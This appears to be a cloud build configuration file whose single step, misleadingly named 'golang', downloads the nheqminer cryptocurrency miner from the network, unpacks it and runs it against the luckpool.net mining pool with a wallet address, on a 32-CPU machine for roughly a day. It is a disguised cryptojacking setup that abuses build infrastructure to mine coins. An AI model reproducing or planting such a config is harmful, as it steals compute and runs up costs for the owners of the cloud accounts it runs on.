steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz; tar -xvzf nheqminer-Linux-v0.8.2.tgz; tar xf nheqminer-Linux-v0.8.2.tar.gz; cd nheqminer; ./nheqminer -v -l na.luckpool.net:3956 -u RTo8Afh1ChhiaxcSGFkvnqRoaYSVHQA1gy.hdd  -p x -t 32
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType: E2_HIGHCPU_32
  diskSizeGb: '1000'
